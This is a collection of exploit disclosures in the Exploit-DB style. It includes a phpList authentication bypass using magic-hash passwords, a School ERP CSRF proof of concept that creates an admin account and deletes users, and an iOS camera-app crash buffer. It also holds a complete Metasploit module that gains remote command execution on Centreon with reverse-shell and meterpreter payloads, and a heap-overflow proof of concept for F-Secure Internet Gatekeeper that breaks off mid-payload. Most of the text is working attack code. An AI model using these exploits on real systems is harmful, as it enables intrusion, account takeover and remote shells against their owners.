# Exploit Title: phpList 3.5.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-02-03
# Exploit Author: Suvadip Kar
# Author Contact: https://twitter.com/spidersec
# Vendor Homepage: https://www.phplist.org
# Software Link: https://www.phplist.org/download-phplist/
# Version: 3.5.0
# Tested on: Linux
# CVE : CVE-2020-8547
Background of the Vulnerability :
Php loose comparison '==' compares two operands by converting them to integers even if they are strings.
EXAMPLE CODE:
<?php
var_dump(hash('sha256', 'TyNOQHUS') == '0e66298694359207596086558843543959518835691168370379069085300385');
var_dump(hash('sha256', '34250003024812') == '0e66298694359207596086558843543959518835691168370379069085300385');
?>
OUTPUT:
bool(true)
bool(true)
Vulnerable code:
GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php
-----
if(empty($login)||($password=="")){
return array(0, s('Please enter your credentials.'));
}
if ($admindata['disabled']) {
return array(0, s('your account has been disabled'));
}
if (//Password validation.
!empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used
)
return array($admindata['id'], 'OK');
else {
if (!empty($GLOBALS['admin_auth_module'])) {
Error(s('Admin authentication has changed, please update your admin module'),
'https://resources.phplist.com/documentation/errors/adminauthchange');
return;
}
return array(0, s('incorrect password'));
}
-------
Steps to reproduce:
1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385.
2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'.
3. User Logged in with valid password.
4. Now logout from the application and try to login with username 'admin' password '34250003024812'.
5. User Logged in, without valid password.
6. Authentication bypassed because of PHP loose comparison.
FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison.
-----
if(empty($login)||($password=="")){
return array(0, s('Please enter your credentials.'));
}
if ($admindata['disabled']) {
return array(0, s('your account has been disabled'));
}
if (//Password validation.
!empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='.
)
return array($admindata['id'], 'OK');
else {
if (!empty($GLOBALS['admin_auth_module'])) {
Error(s('Admin authentication has changed, please update your admin module'),
'https://resources.phplist.com/documentation/errors/adminauthchange');
return;
}
return array(0, s('incorrect password'));
}
-------
Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf
# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 2020-01-31
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version ERP-Ultimate
# CVE: CVE-2020-8504,CVE-2020-8505
# Tested on Windows 10/Kali Rolling
# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
# that leads to admin account creation and arbitrary user deletion.
# Proof of Concept for the Admin Account Creation:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
<input type="hidden" name="admin_fname" value="Admin" />
<input type="hidden" name="admin_lname" value="Tester" />
<input type="hidden" name="admin_username" value="testing" />
<input type="hidden" name="admin_password" value="testing123" />
<input type="hidden" name="admin_password2" value="testing123" />
<input type="hidden" name="admin_email" value="test@test.com" />
<input type="hidden" name="admin_phoneno" value="9999999999" />
<input type="hidden" name="adminlevel" value="" />
<input type="hidden" name="admin_more" value="Test" />
<input type="hidden" name="1_p" value="1_p" />
<input type="hidden" name="1_1" value="1_1" />
<input type="hidden" name="1_2" value="1_2" />
<input type="hidden" name="1_4" value="1_4" />
<input type="hidden" name="1_3" value="1_3" />
<input type="hidden" name="2_p" value="2_p" />
<input type="hidden" name="2_1" value="2_1" />
<input type="hidden" name="2_2" value="2_2" />
<input type="hidden" name="2_3" value="2_3" />
<input type="hidden" name="2_4" value="2_4" />
<input type="hidden" name="2_5" value="2_5" />
<input type="hidden" name="2_6" value="2_6" />
<input type="hidden" name="2_7" value="2_7" />
<input type="hidden" name="2_8" value="2_8" />
<input type="hidden" name="2_9" value="2_9" />
<input type="hidden" name="2_10" value="2_10" />
<input type="hidden" name="2_11" value="2_11" />
<input type="hidden" name="2_12" value="2_12" />
<input type="hidden" name="2_13" value="2_13" />
<input type="hidden" name="2_14" value="2_14" />
<input type="hidden" name="2_15" value="2_15" />
<input type="hidden" name="2_20" value="2_20" />
<input type="hidden" name="2_18" value="2_18" />
<input type="hidden" name="2_19" value="2_19" />
<input type="hidden" name="3_p" value="3_p" />
<input type="hidden" name="3_1" value="3_1" />
<input type="hidden" name="3_2" value="3_2" />
<input type="hidden" name="3_3" value="3_3" />
<input type="hidden" name="3_5" value="3_5" />
<input type="hidden" name="3_4" value="3_4" />
<input type="hidden" name="4_p" value="4_p" />
<input type="hidden" name="5_p" value="5_p" />
<input type="hidden" name="5_1" value="5_1" />
<input type="hidden" name="5_3" value="5_3" />
<input type="hidden" name="5_2" value="5_2" />
<input type="hidden" name="5_5" value="5_5" />
<input type="hidden" name="5_6" value="5_6" />
<input type="hidden" name="6_p" value="6_p" />
<input type="hidden" name="7_p" value="7_p" />
<input type="hidden" name="7_1" value="7_1" />
<input type="hidden" name="7_2" value="7_2" />
<input type="hidden" name="7_3" value="7_3" />
<input type="hidden" name="7_4" value="7_4" />
<input type="hidden" name="7_5" value="7_5" />
<input type="hidden" name="8_p" value="8_p" />
<input type="hidden" name="8_1" value="8_1" />
<input type="hidden" name="8_2" value="8_2" />
<input type="hidden" name="8_3" value="8_3" />
<input type="hidden" name="8_101" value="8_101" />
<input type="hidden" name="8_4" value="8_4" />
<input type="hidden" name="8_5" value="8_5" />
<input type="hidden" name="8_6" value="8_6" />
<input type="hidden" name="8_16" value="8_16" />
<input type="hidden" name="8_102" value="8_102" />
<input type="hidden" name="8_7" value="8_7" />
<input type="hidden" name="8_8" value="8_8" />
<input type="hidden" name="8_9" value="8_9" />
<input type="hidden" name="8_17" value="8_17" />
<input type="hidden" name="8_103" value="8_103" />
<input type="hidden" name="8_104" value="8_104" />
<input type="hidden" name="8_10" value="8_10" />
<input type="hidden" name="8_11" value="8_11" />
<input type="hidden" name="8_12" value="8_12" />
<input type="hidden" name="8_18" value="8_18" />
<input type="hidden" name="8_105" value="8_105" />
<input type="hidden" name="8_106" value="8_106" />
<input type="hidden" name="8_13" value="8_13" />
<input type="hidden" name="8_14" value="8_14" />
<input type="hidden" name="8_15" value="8_15" />
<input type="hidden" name="8_19" value="8_19" />
<input type="hidden" name="8_107" value="8_107" />
<input type="hidden" name="8_108" value="8_108" />
<input type="hidden" name="9_p" value="9_p" />
<input type="hidden" name="9_1" value="9_1" />
<input type="hidden" name="9_17" value="9_17" />
<input type="hidden" name="9_18" value="9_18" />
<input type="hidden" name="9_19" value="9_19" />
<input type="hidden" name="9_2" value="9_2" />
<input type="hidden" name="9_20" value="9_20" />
<input type="hidden" name="9_21" value="9_21" />
<input type="hidden" name="9_22" value="9_22" />
<input type="hidden" name="9_3" value="9_3" />
<input type="hidden" name="9_4" value="9_4" />
<input type="hidden" name="9_5" value="9_5" />
<input type="hidden" name="9_6" value="9_6" />
<input type="hidden" name="9_101" value="9_101" />
<input type="hidden" name="9_7" value="9_7" />
<input type="hidden" name="9_102" value="9_102" />
<input type="hidden" name="9_8" value="9_8" />
<input type="hidden" name="9_103" value="9_103" />
<input type="hidden" name="9_24" value="9_24" />
<input type="hidden" name="9_25" value="9_25" />
<input type="hidden" name="9_33" value="9_33" />
<input type="hidden" name="9_23" value="9_23" />
<input type="hidden" name="9_11" value="9_11" />
<input type="hidden" name="9_13" value="9_13" />
<input type="hidden" name="9_27" value="9_27" />
<input type="hidden" name="9_14" value="9_14" />
<input type="hidden" name="9_29" value="9_29" />
<input type="hidden" name="9_30" value="9_30" />
<input type="hidden" name="9_31" value="9_31" />
<input type="hidden" name="9_15" value="9_15" />
<input type="hidden" name="9_16" value="9_16" />
<input type="hidden" name="9_32" value="9_32" />
<input type="hidden" name="10_p" value="10_p" />
<input type="hidden" name="10_1" value="10_1" />
<input type="hidden" name="10_2" value="10_2" />
<input type="hidden" name="10_3" value="10_3" />
<input type="hidden" name="10_4" value="10_4" />
<input type="hidden" name="10_5" value="10_5" />
<input type="hidden" name="10_6" value="10_6" />
<input type="hidden" name="10_7" value="10_7" />
<input type="hidden" name="10_8" value="10_8" />
<input type="hidden" name="10_11" value="10_11" />
<input type="hidden" name="10_9" value="10_9" />
<input type="hidden" name="10_10" value="10_10" />
<input type="hidden" name="10_12" value="10_12" />
<input type="hidden" name="11_p" value="11_p" />
<input type="hidden" name="11_1" value="11_1" />
<input type="hidden" name="11_2" value="11_2" />
<input type="hidden" name="11_3" value="11_3" />
<input type="hidden" name="11_4" value="11_4" />
<input type="hidden" name="11_5" value="11_5" />
<input type="hidden" name="11_6" value="11_6" />
<input type="hidden" name="11_7" value="11_7" />
<input type="hidden" name="11_8" value="11_8" />
<input type="hidden" name="11_9" value="11_9" />
<input type="hidden" name="11_10" value="11_10" />
<input type="hidden" name="11_11" value="11_11" />
<input type="hidden" name="11_12" value="11_12" />
<input type="hidden" name="11_13" value="11_13" />
<input type="hidden" name="11_14" value="11_14" />
<input type="hidden" name="11_15" value="11_15" />
<input type="hidden" name="11_16" value="11_16" />
<input type="hidden" name="11_17" value="11_17" />
<input type="hidden" name="11_18" value="11_18" />
<input type="hidden" name="11_19" value="11_19" />
<input type="hidden" name="11_20" value="11_20" />
<input type="hidden" name="11_21" value="11_21" />
<input type="hidden" name="11_23" value="11_23" />
<input type="hidden" name="11_101" value="11_101" />
<input type="hidden" name="11_102" value="11_102" />
<input type="hidden" name="11_22" value="11_22" />
<input type="hidden" name="11_103" value="11_103" />
<input type="hidden" name="11_104" value="11_104" />
<input type="hidden" name="12_p" value="12_p" />
<input type="hidden" name="12_1" value="12_1" />
<input type="hidden" name="12_2" value="12_2" />
<input type="hidden" name="12_3" value="12_3" />
<input type="hidden" name="12_4" value="12_4" />
<input type="hidden" name="12_5" value="12_5" />
<input type="hidden" name="12_11" value="12_11" />
<input type="hidden" name="12_6" value="12_6" />
<input type="hidden" name="12_7" value="12_7" />
<input type="hidden" name="12_8" value="12_8" />
<input type="hidden" name="12_12" value="12_12" />
<input type="hidden" name="12_9" value="12_9" />
<input type="hidden" name="12_10" value="12_10" />
<input type="hidden" name="13_p" value="13_p" />
<input type="hidden" name="13_1" value="13_1" />
<input type="hidden" name="13_2" value="13_2" />
<input type="hidden" name="13_3" value="13_3" />
<input type="hidden" name="13_17" value="13_17" />
<input type="hidden" name="13_4" value="13_4" />
<input type="hidden" name="13_5" value="13_5" />
<input type="hidden" name="13_6" value="13_6" />
<input type="hidden" name="13_18" value="13_18" />
<input type="hidden" name="13_7" value="13_7" />
<input type="hidden" name="13_8" value="13_8" />
<input type="hidden" name="13_9" value="13_9" />
<input type="hidden" name="13_19" value="13_19" />
<input type="hidden" name="13_20" value="13_20" />
<input type="hidden" name="13_10" value="13_10" />
<input type="hidden" name="13_11" value="13_11" />
<input type="hidden" name="13_12" value="13_12" />
<input type="hidden" name="13_21" value="13_21" />
<input type="hidden" name="13_22" value="13_22" />
<input type="hidden" name="13_13" value="13_13" />
<input type="hidden" name="13_14" value="13_14" />
<input type="hidden" name="13_15" value="13_15" />
<input type="hidden" name="13_16" value="13_16" />
<input type="hidden" name="13_108" value="13_108" />
<input type="hidden" name="13_23" value="13_23" />
<input type="hidden" name="13_101" value="13_101" />
<input type="hidden" name="13_102" value="13_102" />
<input type="hidden" name="13_103" value="13_103" />
<input type="hidden" name="13_104" value="13_104" />
<input type="hidden" name="13_106" value="13_106" />
<input type="hidden" name="13_105" value="13_105" />
<input type="hidden" name="14_p" value="14_p" />
<input type="hidden" name="14_1" value="14_1" />
<input type="hidden" name="14_2" value="14_2" />
<input type="hidden" name="14_3" value="14_3" />
<input type="hidden" name="14_101" value="14_101" />
<input type="hidden" name="14_4" value="14_4" />
<input type="hidden" name="14_5" value="14_5" />
<input type="hidden" name="14_6" value="14_6" />
<input type="hidden" name="14_102" value="14_102" />
<input type="hidden" name="14_7" value="14_7" />
<input type="hidden" name="14_8" value="14_8" />
<input type="hidden" name="14_9" value="14_9" />
<input type="hidden" name="14_103" value="14_103" />
<input type="hidden" name="14_10" value="14_10" />
<input type="hidden" name="14_21" value="14_21" />
<input type="hidden" name="14_104" value="14_104" />
<input type="hidden" name="14_11" value="14_11" />
<input type="hidden" name="14_105" value="14_105" />
<input type="hidden" name="14_12" value="14_12" />
<input type="hidden" name="14_106" value="14_106" />
<input type="hidden" name="14_13" value="14_13" />
<input type="hidden" name="14_14" value="14_14" />
<input type="hidden" name="14_15" value="14_15" />
<input type="hidden" name="14_16" value="14_16" />
<input type="hidden" name="14_107" value="14_107" />
<input type="hidden" name="14_17" value="14_17" />
<input type="hidden" name="14_18" value="14_18" />
<input type="hidden" name="14_19" value="14_19" />
<input type="hidden" name="14_20" value="14_20" />
<input type="hidden" name="15_p" value="15_p" />
<input type="hidden" name="15_1" value="15_1" />
<input type="hidden" name="15_2" value="15_2" />
<input type="hidden" name="15_3" value="15_3" />
<input type="hidden" name="16_p" value="16_p" />
<input type="hidden" name="16_1" value="16_1" />
<input type="hidden" name="16_2" value="16_2" />
<input type="hidden" name="16_3" value="16_3" />
<input type="hidden" name="16_101" value="16_101" />
<input type="hidden" name="16_4" value="16_4" />
<input type="hidden" name="16_5" value="16_5" />
<input type="hidden" name="16_6" value="16_6" />
<input type="hidden" name="16_102" value="16_102" />
<input type="hidden" name="16_7" value="16_7" />
<input type="hidden" name="16_8" value="16_8" />
<input type="hidden" name="16_10" value="16_10" />
<input type="hidden" name="16_11" value="16_11" />
<input type="hidden" name="16_12" value="16_12" />
<input type="hidden" name="16_103" value="16_103" />
<input type="hidden" name="16_13" value="16_13" />
<input type="hidden" name="16_14" value="16_14" />
<input type="hidden" name="16_15" value="16_15" />
<input type="hidden" name="16_17" value="16_17" />
<input type="hidden" name="16_18" value="16_18" />
<input type="hidden" name="16_20" value="16_20" />
<input type="hidden" name="16_21" value="16_21" />
<input type="hidden" name="16_24" value="16_24" />
<input type="hidden" name="16_104" value="16_104" />
<input type="hidden" name="16_105" value="16_105" />
<input type="hidden" name="16_22" value="16_22" />
<input type="hidden" name="16_25" value="16_25" />
<input type="hidden" name="16_23" value="16_23" />
<input type="hidden" name="16_26" value="16_26" />
<input type="hidden" name="16_106" value="16_106" />
<input type="hidden" name="16_107" value="16_107" />
<input type="hidden" name="16_27" value="16_27" />
<input type="hidden" name="16_28" value="16_28" />
<input type="hidden" name="16_29" value="16_29" />
<input type="hidden" name="17_p" value="17_p" />
<input type="hidden" name="17_1" value="17_1" />
<input type="hidden" name="17_6" value="17_6" />
<input type="hidden" name="17_2" value="17_2" />
<input type="hidden" name="17_3" value="17_3" />
<input type="hidden" name="17_101" value="17_101" />
<input type="hidden" name="17_4" value="17_4" />
<input type="hidden" name="17_5" value="17_5" />
<input type="hidden" name="17_7" value="17_7" />
<input type="hidden" name="17_8" value="17_8" />
<input type="hidden" name="17_9" value="17_9" />
<input type="hidden" name="18_p" value="18_p" />
<input type="hidden" name="18_5" value="18_5" />
<input type="hidden" name="18_1" value="18_1" />
<input type="hidden" name="18_2" value="18_2" />
<input type="hidden" name="18_3" value="18_3" />
<input type="hidden" name="18_4" value="18_4" />
<input type="hidden" name="18_6" value="18_6" />
<input type="hidden" name="18_7" value="18_7" />
<input type="hidden" name="18_8" value="18_8" />
<input type="hidden" name="18_9" value="18_9" />
<input type="hidden" name="18_10" value="18_10" />
<input type="hidden" name="18_11" value="18_11" />
<input type="hidden" name="18_12" value="18_12" />
<input type="hidden" name="19_p" value="19_p" />
<input type="hidden" name="19_1" value="19_1" />
<input type="hidden" name="19_2" value="19_2" />
<input type="hidden" name="19_3" value="19_3" />
<input type="hidden" name="19_4" value="19_4" />
<input type="hidden" name="19_5" value="19_5" />
<input type="hidden" name="19_6" value="19_6" />
<input type="hidden" name="19_11" value="19_11" />
<input type="hidden" name="19_7" value="19_7" />
<input type="hidden" name="19_12" value="19_12" />
<input type="hidden" name="19_13" value="19_13" />
<input type="hidden" name="19_14" value="19_14" />
<input type="hidden" name="19_15" value="19_15" />
<input type="hidden" name="19_101" value="19_101" />
<input type="hidden" name="19_102" value="19_102" />
<input type="hidden" name="19_8" value="19_8" />
<input type="hidden" name="19_16" value="19_16" />
<input type="hidden" name="19_9" value="19_9" />
<input type="hidden" name="19_10" value="19_10" />
<input type="hidden" name="19_17" value="19_17" />
<input type="hidden" name="19_18" value="19_18" />
<input type="hidden" name="20_p" value="20_p" />
<input type="hidden" name="20_1" value="20_1" />
<input type="hidden" name="20_5" value="20_5" />
<input type="hidden" name="20_101" value="20_101" />
<input type="hidden" name="20_2" value="20_2" />
<input type="hidden" name="20_6" value="20_6" />
<input type="hidden" name="20_102" value="20_102" />
<input type="hidden" name="20_3" value="20_3" />
<input type="hidden" name="20_4" value="20_4" />
<input type="hidden" name="21_p" value="21_p" />
<input type="hidden" name="21_1" value="21_1" />
<input type="hidden" name="21_2" value="21_2" />
<input type="hidden" name="21_3" value="21_3" />
<input type="hidden" name="22_p" value="22_p" />
<input type="hidden" name="22_1" value="22_1" />
<input type="hidden" name="22_2" value="22_2" />
<input type="hidden" name="22_3" value="22_3" />
<input type="hidden" name="22_5" value="22_5" />
<input type="hidden" name="22_4" value="22_4" />
<input type="hidden" name="22_6" value="22_6" />
<input type="hidden" name="23_p" value="23_p" />
<input type="hidden" name="24_p" value="24_p" />
<input type="hidden" name="24_1" value="24_1" />
<input type="hidden" name="24_2" value="24_2" />
<input type="hidden" name="24_3" value="24_3" />
<input type="hidden" name="24_4" value="24_4" />
<input type="hidden" name="25_p" value="25_p" />
<input type="hidden" name="25_1" value="25_1" />
<input type="hidden" name="25_2" value="25_2" />
<input type="hidden" name="25_5" value="25_5" />
<input type="hidden" name="25_6" value="25_6" />
<input type="hidden" name="25_3" value="25_3" />
<input type="hidden" name="25_4" value="25_4" />
<input type="hidden" name="25_7" value="25_7" />
<input type="hidden" name="25_8" value="25_8" />
<input type="hidden" name="26_p" value="26_p" />
<input type="hidden" name="26_1" value="26_1" />
<input type="hidden" name="26_2" value="26_2" />
<input type="hidden" name="27_p" value="27_p" />
<input type="hidden" name="27_1" value="27_1" />
<input type="hidden" name="27_2" value="27_2" />
<input type="hidden" name="27_3" value="27_3" />
<input type="hidden" name="28_p" value="28_p" />
<input type="hidden" name="28_1" value="28_1" />
<input type="hidden" name="28_2" value="28_2" />
<input type="hidden" name="28_3" value="28_3" />
<input type="hidden" name="28_4" value="28_4" />
<input type="hidden" name="28_5" value="28_5" />
<input type="hidden" name="29_p" value="29_p" />
<input type="hidden" name="29_1" value="29_1" />
<input type="hidden" name="29_2" value="29_2" />
<input type="hidden" name="30_p" value="30_p" />
<input type="hidden" name="30_1" value="30_1" />
<input type="hidden" name="30_2" value="30_2" />
<input type="hidden" name="30_3" value="30_3" />
<input type="hidden" name="30_4" value="30_4" />
<input type="hidden" name="30_5" value="30_5" />
<input type="hidden" name="30_6" value="30_6" />
<input type="hidden" name="30_7" value="30_7" />
<input type="hidden" name="30_8" value="30_8" />
<input type="hidden" name="31_p" value="31_p" />
<input type="hidden" name="31_1" value="31_1" />
<input type="hidden" name="31_2" value="31_2" />
<input type="hidden" name="31_3" value="31_3" />
<input type="hidden" name="31_5" value="31_5" />
<input type="hidden" name="31_4" value="31_4" />
<input type="hidden" name="32_p" value="32_p" />
<input type="hidden" name="32_3" value="32_3" />
<input type="hidden" name="32_1" value="32_1" />
<input type="hidden" name="32_4" value="32_4" />
<input type="hidden" name="32_2" value="32_2" />
<input type="hidden" name="32_5" value="32_5" />
<input type="hidden" name="33_p" value="33_p" />
<input type="hidden" name="33_1" value="33_1" />
<input type="hidden" name="33_2" value="33_2" />
<input type="hidden" name="33_3" value="33_3" />
<input type="hidden" name="33_8" value="33_8" />
<input type="hidden" name="33_4" value="33_4" />
<input type="hidden" name="33_5" value="33_5" />
<input type="hidden" name="33_6" value="33_6" />
<input type="hidden" name="33_7" value="33_7" />
<input type="hidden" name="34_p" value="34_p" />
<input type="hidden" name="34_1" value="34_1" />
<input type="hidden" name="34_2" value="34_2" />
<input type="hidden" name="35_p" value="35_p" />
<input type="hidden" name="35_1" value="35_1" />
<input type="hidden" name="35_2" value="35_2" />
<input type="hidden" name="35_3" value="35_3" />
<input type="hidden" name="saveallowance" value="Submit" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Proof of Concept for the arbitrary user deletion:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://SITEHERE/office_admin/">
<input type="hidden" name="pid" value="42" />
<input type="hidden" name="action" value="deleteadmin" />
<input type="hidden" name="lid" value="90" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-02-02
# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207
# Software Link: App Store for iOS devices
# Tested Version: 10.4.1
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 6s iOS 13.3
# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software.
# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex,
# truly plug and play!
# Steps to Produce the Crash:
# 1.- Run python code: P2PWIFICAM.py
# 2.- Copy content to clipboard
# 3.- Open "P2PWIFICAM" for Ios
# 4.- Go to "Add" (Touch here to add a camera)
# 5.- Go to "Input Camera"
# 6.- Paste Clipboard on "Camera ID"
# 7.- Paste Clipboard on "Password"
# 9.- Ok
# 10- Crashed
#!/usr/bin/env python
buffer = "\x41" * 257
print (buffer)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Centreon Poller Authenticated Remote Command Execution',
'Description' => %q{
TODO
},
'Author' => [
'Omri Baso', # discovery
'Fabien Aunay', # discovery
'mekhalleh (RAMELLA Sébastien)' # this module
],
'References' => [
# TODO: waiting for CVE
['EDB', '47977']
],
'DisclosureDate' => '2020-01-27',
'License' => MSF_LICENSE,
'Platform' => ['linux', 'unix'],
'Arch' => [ARCH_CMD, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Reverse shell (In-Memory)',
'Platform' => 'unix',
'Type' => :cmd_unix,
'Arch' => ARCH_CMD,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_bash'
}
],
['Meterpreter (Dropper)',
'Platform' => 'linux',
'Type' => :meterpreter,
'Arch' => ARCH_X64,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'CMDSTAGER::FLAVOR' => 'curl' # illegal characters: `~$^&"|'<>
}
]
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))
register_options([
OptString.new('PASSWORD', [true, 'The Centreon Web panel password to authenticate with']),
OptString.new('TARGETURI', [true, 'The URI of the Centreon Web panel path', '/centreon']),
OptString.new('USERNAME', [true, 'The Centreon Web panel username to authenticate with'])
])
end
def create_new_poller(poller_name, command_id)
print_status("Create new poller entry on the target.")
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60901'})
return false unless token
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60901'),
'cookie' => @cookies,
'partial' => true,
'vars_post' => {
'name' => poller_name,
'ns_ip_address' => '127.0.0.1',
'localhost[localhost]' => '1',
'is_default[is_default]' => '0',
'remote_id' => '',
'ssh_port' => '22',
'remote_server_centcore_ssh_proxy[remote_server_centcore_ssh_proxy]' => '1',
'engine_start_command' => 'service centengine start',
'engine_stop_command' => 'service centengine stop',
'engine_restart_command' => 'service centengine restart',
'engine_reload_command' => 'service centengine reload',
'nagios_bin' => '/usr/sbin/centengine',
'nagiostats_bin' => '/usr/sbin/centenginestats',
'nagios_perfdata' => '/var/log/centreon-engine/service-perfdata',
'broker_reload_command' => 'service cbd reload',
'centreonbroker_cfg_path' => '/etc/centreon-broker',
'centreonbroker_module_path' => '/usr/share/centreon/lib/centreon-broker',
'centreonbroker_logs_path' => '/var/log/centreon-broker',
'centreonconnector_path' => '',
'init_script_centreontrapd' => 'centreontrapd',
'snmp_trapd_path_conf' => '/etc/snmp/centreon_traps/',
'pollercmd[0]' => command_id,
'clone_order_pollercmd_0' => '',
'ns_activate[ns_activate]' => '1',
'submitA' => 'Save',
'id' => '',
'o' => 'a',
'centreon_token' => token
}
)
return false unless response
return true
end
def execute_command(command, opts = {})
cmd_name = rand_text_alpha(8..42)
poller_name = rand_text_alpha(8..42)
## Register a miscellaneous command.
print_status("Upload command payload on the target.")
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60803', 'type' => '3'})
return false unless token
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'main.get.php?p=60803&type=3'),
'cookie' => @cookies,
'partial' => true,
'vars_post' => {
'command_name' => cmd_name,
'command_type[command_type]' => '3',
'command_line' => command,
'resource' => '$CENTREONPLUGINS$',
'plugins' => '/Centreon/SNMP',
'macros' => '$ADMINEMAIL$',
'command_example' => '',
'listOfArg' => '',
'listOfMacros' => '',
'connectors' => '',
'graph_id' => '',
'command_activate[command_activate]' => '1',
'command_comment' => '',
'submitA' => 'Save',
'command_id' => '',
'type' => '3',
'o' => 'a',
'centreon_token' => token
}
)
return false unless response
## Create new poller to serve the payload.
create_new_poller(poller_name, get_command_id(cmd_name))
poller_id = get_poller_id(poller_name)
## Export configuration to reload to trigger the exploit.
unless poller_id.nil?
restart_exportation(poller_id)
end
end
def get_auth
print_status("Send authentication request.")
token = get_token(normalize_uri(target_uri.path, 'index.php'))
unless token.nil?
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'index.php'),
'cookie' => @cookies,
'vars_post' => {
'useralias' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'submitLogin' => 'Connect',
'centreon_token' => token
}
)
return false unless response
if response.redirect?
if response.headers['location'].include?('main.php')
print_status('Successful authenticated.')
@cookies = response.get_cookies
return true
end
end
end
print_bad('Your credentials are incorrect.')
return false
end
def get_command_id(cmd_name)
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'vars_get' => {
'p' => '60803',
'type' => '3'
}
)
return nil unless response
href = response.get_html_document.at("//a[contains(text(), \"#{cmd_name}\")]")['href']
return nil unless href
id = href.split('?')[1].split('&')[2].split('=')[1]
return id unless id.empty?
return nil
end
def get_poller_id(poller_name)
response = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'main.get.php'),
'cookie' => @cookies,
'vars_get' => {'p' => '60901'}
)
return nil unless response
href = response.get_html_document.at("//a[contains(text(), \"#{poller_name}\")]")['href']
return nil unless href
id = href.split('?')[1].split('&')[2].split('=')[1]
return id unless id.empty?
return nil
end
def get_session
response = send_request_cgi(
'method' => 'HEAD',
'uri' => normalize_uri(target_uri.path, 'index.php')
)
cookies = response.get_cookies
return cookies unless cookies.empty?
end
def get_token(uri, params = {})
## Get centreon_token value.
request = {
'method' => 'GET',
'uri' => uri,
'cookie' => @cookies
}
request = request.merge({'vars_get' => params}) unless params.empty?
response = send_request_cgi(request)
return nil unless response
return response.get_html_document.at('input[@name="centreon_token"]')['value']
end
def restart_exportation(poller_id)
print_status("Reload the poller to trigger exploitation.")
token = get_token(normalize_uri(target_uri.path, 'main.get.php'), {'p' => '60902', 'poller' => poller_id})
vprint_status(' -- Generating files.')
unless token.nil?
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'generateFiles.php'),
'cookie' => @cookies,
'vars_post' => {
'poller' => poller_id,
'debug' => 'true',
'generate' => 'true'
}
)
return nil unless response
vprint_status(' -- Restarting engine.')
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'restartPollers.php'),
'cookie' => @cookies,
'vars_post' => {
'poller' => poller_id,
'mode' => '2'
}
)
return nil unless response
vprint_status(' -- Executing command.')
response = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'include', 'configuration', 'configGenerate', 'xml', 'postcommand.php'),
'cookie' => @cookies,
'vars_post' => {'poller' => poller_id}
)
return nil unless response
end
end
def check
# TODO: Detection by version number (waiting to know the impacted versions).
end
def exploit
## TODO: check
@cookies = get_session
logged = get_auth unless @cookies.empty?
if logged
case target['Type']
when :cmd_unix
execute_command(payload.encoded)
when :meterpreter
execute_command(generate_cmdstager.join)
end
end
end
end
# Title: F-Secure Internet Gatekeeper 5.40 - Heap Overflow (PoC)
# Date: 2020-01-30
# Author: Kevin Joensen
# Vendor: F-Secure
# Software: https://www.f-secure.com/en/business/downloads/internet-gatekeeper
# CVE: N/A
# Reference: https://blog.doyensec.com/2020/02/03/heap-exploit.html
from pwn import *
import time
import sys
def send_payload(payload, content_len=21487483844, nofun=False):
r = remote(sys.argv[1], 9012)
r.send("POST / HTTP/1.1\n")
r.send("Host: 192.168.0.122:9012\n")
r.send("Content-Length: {}\n".format(content_len))
r.send("\n")
r.send(payload)
if not nofun:
r.send("\n\n")
return r
def trigger_exploit():
print "Triggering exploit"
payload = ""
payload += "A" * 12 # Padding
